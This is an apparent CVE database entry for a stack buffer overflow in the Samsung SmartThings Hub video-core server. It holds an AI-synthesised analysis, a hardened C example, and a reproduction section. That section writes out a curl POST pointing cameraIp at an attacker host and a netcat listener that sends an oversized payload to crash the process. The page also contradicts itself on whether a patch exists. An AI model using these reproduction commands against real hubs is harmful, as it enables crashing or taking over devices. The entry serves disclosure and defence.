CVE-2018-3867
Description
An exploitable stack-based buffer overflow vulnerability exists in the samsungWifiScan callback notification of video-core's HTTP server of Samsung SmartThings Hub STH-ETH-250 devices with firmware version 0.20.17. The video-core process incorrectly handles the answer received from a smart camera, leading to a buffer overflow on the stack. An attacker can send a series of HTTP requests to trigger this vulnerability.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Stack-based buffer overflow in Samsung SmartThings Hub video-core HTTP server allows remote attackers with low privileges to execute arbitrary code.
Vulnerability
Stack-based buffer overflow in the samsungWifiScan callback notification handler of the video-core HTTP server in Samsung SmartThings Hub STH-ETH-250 with firmware version 0.20.17. The video-core process fails to properly validate the size of the answer received from a smart camera, leading to a buffer overflow on the stack. [1]
Exploitation
An attacker can send a series of crafted HTTP requests to the video-core HTTP server that make the hub fetch and process a malicious camera response, overflowing a stack buffer. The attacker does not require physical access but must be able to communicate with the hub over the network. According to the CVSS vector, low privileges are required (PR:L), suggesting the attacker may need some level of authentication or network access. [1]
Impact
Successful exploitation allows an attacker to execute arbitrary code on the hub with the privileges of the video-core process. Given the CVSS scope change (S:C), the attacker can compromise resources beyond the vulnerable component, potentially gaining full control of the hub. This can lead to disclosure of sensitive information, modification of device settings, and denial of service. [1]
Mitigation
As of the advisory publication date (August 2018), no patch was available. Users should monitor Samsung's security advisories for firmware updates. The affected firmware version is 0.20.17; upgrading to a later version may address the vulnerability. No workarounds are documented. [1]
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Range: =0.20.17
- Samsung/SmartThings Hub STH-ETH-250v5, range: firmware version 0.20.17
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"Unbounded sprintf copy of the smart camera's HTTP response into a fixed-size stack buffer in sub_45AA8."
Attack vector
An attacker sends a POST request to `http://127.0.0.1:3000/samsungWifiScan` with a `cameraIp` pointing to an attacker-controlled machine [ref_id=1]. The video-core process uses libcurl to send an HTTP GET to that camera IP; the attacker replies with a crafted HTTP response containing a large payload (e.g., 0x700 bytes of 'A') [ref_id=1]. This response is then copied via `sprintf` into a fixed stack buffer without size checking, causing a stack-based buffer overflow [CWE-120] [ref_id=1]. The attacker can trigger this from a malicious SmartApp running on the hub, by impersonating the remote SmartThings servers, or potentially via the mobile application with a valid OAuth token [ref_id=1].
Affected code
The vulnerability resides in the `sub_45AA8` function of the video-core process, which handles the callback notification for the `/samsungWifiScan` endpoint. The function allocates a stack buffer at `sprintf_dest` (offset `-0x6E0`) and passes the unconstrained smart camera HTTP response directly as a format argument to `sprintf` at [7] [ref_id=1]. The camera response is obtained via `curl_easy_perform` at [4] and stored in `curl_data_buffer`, then passed as the second argument (`R1`) to `sub_45AA8` at [5] [ref_id=1].
What the fix does
The advisory states that the vendor patched the vulnerability on 2018-07-17, but no patch diff is included in the bundle [ref_id=1]. The root cause is the use of `sprintf` with an unconstrained camera response into a stack buffer of fixed size (0x70C bytes for the `s` buffer, with `sprintf_dest` at offset `-0x6E0`) [ref_id=1]. A proper fix would replace the unbounded `sprintf` with a bounded copy function (e.g., `snprintf`) or validate the length of the camera response before copying it to the stack buffer [CWE-120].
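The bounded handling described above, written as an added example in the shape of the vulnerable callback; this is not the hub's firmware or code from the Talos advisory, and the buffer size, function names and constructed test input are assumptions. The advisory's pattern, `sprintf(sprintf_dest, curl_data_buffer)` with no bound and the untrusted body acting as the format string, is what the `store_camera_response` function replaces.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed stack buffer size; the page gives sprintf_dest at offset -0x6E0,
 * the real frame layout is not known, so this is an illustration only. */
#define CAMERA_RESP_MAX 0x6E0

/* Hardened replacement: copy the curl body into dest only if it fits. */
bool store_camera_response(const char *curl_data_buffer, size_t curl_data_len,
                           char *dest, size_t dest_size)
{
    if (curl_data_buffer == NULL || dest == NULL || dest_size == 0)
        return false;
    if (curl_data_len >= dest_size)        /* validate before any copy; room for NUL */
        return false;
    /* fixed format string, body as argument, write bounded by dest_size */
    int n = snprintf(dest, dest_size, "%.*s", (int)curl_data_len, curl_data_buffer);
    return n >= 0 && (size_t)n < dest_size;
}

/* Stand-in for the samsungWifiScan callback: the answer still lands in a
 * fixed-size stack buffer, but an oversized answer is dropped, not written. */
bool samsung_wifi_scan_callback(const char *body, size_t body_len)
{
    char sprintf_dest[CAMERA_RESP_MAX];
    if (!store_camera_response(body, body_len, sprintf_dest, sizeof sprintf_dest))
        return false;
    return strlen(sprintf_dest) == body_len;   /* stored intact */
}

/* Feed a constructed answer of `len` bytes of 'A' (like the advisory's oversized
 * reply) through the callback; returns whether it was accepted. */
bool simulate_camera_answer(size_t len)
{
    static char body[0x800];                 /* constructed input, not real traffic */
    if (len >= sizeof body)
        return false;
    memset(body, 'A', len);
    body[len] = '\0';
    return samsung_wifi_scan_callback(body, len);
}

int main(void)
{
    printf("0x700-byte answer accepted: %d, 64-byte answer accepted: %d\n",
           simulate_camera_answer(0x700), simulate_camera_answer(64));
    return 0;
}
```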
Preconditions
- network: Attacker must be able to send HTTP requests to the video-core process on localhost port 3000, either via a malicious SmartApp, by impersonating the remote SmartThings servers, or through the mobile application with a valid OAuth token
- network: Attacker must control a machine reachable from the hub that can respond to the HTTP GET request sent by video-core to the specified cameraIp
- config: The video-core process must be running (default on Samsung SmartThings Hub STH-ETH-250 with firmware 0.20.17)
Reproduction
From inside the hub, send: `curl -X POST 'http://127.0.0.1:3000/samsungWifiScan' -d "{\"cameraIp\":\"${sAttackerIP}:${sAttackerPort}\"}"`. On the attacker machine, run: `perl -e 'print "A"x0x700' | nc -l -p ${sAttackerPort}`. Once the netcat connection is closed, video-core should crash [ref_id=1].
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1. www.talosintelligence.com/vulnerability_reports/TALOS-2018-0549 (MISC)
News mentions
No linked articles in our index yet.